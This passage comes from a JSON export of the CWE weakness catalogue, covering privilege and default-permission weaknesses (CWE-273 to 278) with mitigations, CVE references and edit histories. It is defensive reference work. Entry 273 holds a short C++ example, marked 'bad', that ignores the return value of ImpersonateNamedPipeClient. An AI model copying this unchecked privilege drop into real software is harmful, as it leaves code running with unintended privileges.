Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"273":{"attr":{"@_ID":"273","@_Name":"Improper Check for Dropped Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software attempts to drop privileges but does not check or incorrectly checks to see if the drop succeeded.","Extended_Description":"If the drop fails, the software will continue to run with the raised privileges, which might provide additional access to unprivileged users.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"271","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"252","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"In Windows based environments that have access control, impersonation is used so that access checks can be performed on a client identity by a server with higher privileges. By impersonating the client, the server is restricted to client-level security -- although in different threads it may have much higher privileges."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","This issue is likely to occur in restrictive environments in which the operating system or application provides fine-grained control over privilege management."]}}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped."},{"Scope":["Access Control","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Hide Activities"],"Note":"If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-53"},"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"In Windows, make sure that the process token has the SeImpersonatePrivilege(Microsoft Server 2003). Code that relies on impersonation for security must ensure that the impersonation succeeded, i.e., that a proper privilege demotion happened."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to take on the privileges of a user before creating a file, thus avoiding performing the action with unnecessarily high privileges:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"bool DoSecureStuff(HANDLE hPipe) {}","xhtml:div":{"#text":"bool fDataWritten = false;ImpersonateNamedPipeClient(hPipe);HANDLE hFile = CreateFile(...);/../RevertToSelf()/../","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"The call to ImpersonateNamedPipeClient may fail, but the return value is not checked. If the call fails, the code may execute with higher privileges than intended. In this case, an attacker could exploit this behavior to write a file to a location that the attacker does not have access to."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check whether privileges were dropped successfully"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS37-C","Entry_Name":"Ensure that privilege relinquishment is successful","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Background_Details, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Failure to Check Whether Privileges Were Dropped Successfully","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Check for Successfully Dropped Privileges","attr":{"@_Date":"2009-05-27"}}]}},"274":{"attr":{"@_ID":"274","@_Name":"Improper Handling of Insufficient Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"271","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"280","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1564","Description":"System limits are not properly enforced after privileges are dropped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1564"},{"Reference":"CVE-2005-3286","Description":"Firewall crashes when it can\'t read a critical memory block that was protected by a malicious process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3286"},{"Reference":"CVE-2005-1641","Description":"Does not give admin sufficient privileges to overcome otherwise legitimate user actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1641"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient privileges"}},"Notes":{"Note":[{"#text":"CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future.","attr":{"@_Type":"Maintenance"}},{"#text":"Overlaps dropped privileges, insufficient permissions.","attr":{"@_Type":"Relationship"}},{"#text":"This has a layering relationship with Unchecked Error Condition and Unchecked Return Value.","attr":{"@_Type":"Theoretical"}},{"#text":"Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Maintenance_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationship_Notes, Theoretical_Notes"}],"Previous_Entry_Name":[{"#text":"Insufficient Privileges","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Insufficient Privileges","attr":{"@_Date":"2009-05-27"}}]}},"276":{"attr":{"@_ID":"276","@_Name":"Incorrect Default Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During installation, installed file permissions are set to allow anyone to modify those files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Installation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inter-application Flow Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria","Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Forced Path Execution"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"The architecture needs to access and modification attributes for files to only those users who actually require those actions."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1941","Description":"Executables installed world-writable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1941"},{"Reference":"CVE-2002-1713","Description":"Home directories installed world-readable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1713"},{"Reference":"CVE-2001-1550","Description":"World-writable log files allow information loss; world-readable file has cleartext passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1550"},{"Reference":"CVE-2002-1711","Description":"World-readable directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1711"},{"Reference":"CVE-2002-1844","Description":"Windows product uses insecure permissions when installing on Solaris (genesis: port error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1844"},{"Reference":"CVE-2001-0497","Description":"Insecure permissions for a shared secret key file. Overlaps cryptographic problem.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0497"},{"Reference":"CVE-1999-0426","Description":"Default permissions of a device allow IP spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0426"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure Default Permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access permissions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO01-J","Entry_Name":"Create files with appropriate access permission"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"81"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Insecure Defaults&#34;, Page 69"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Modes_of_Introduction, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insecure Default Permissions","attr":{"@_Date":"2009-05-27"}}}},"277":{"attr":{"@_ID":"277","@_Name":"Insecure Inherited Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product defines a set of insecure permissions that are inherited by objects that are created by the program.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1841","Description":"User\'s umask is used when creating temp files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1841"},{"Reference":"CVE-2002-1786","Description":"Insecure umask for core dumps [is the umask preserved or assigned?].","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1786"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure inherited permissions"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}]}},"278":{"attr":{"@_ID":"278","@_Name":"Insecure Preserved Inherited Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1724","Description":"Does not obey specified permissions when exporting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1724"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure preserved inherited permissions"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated 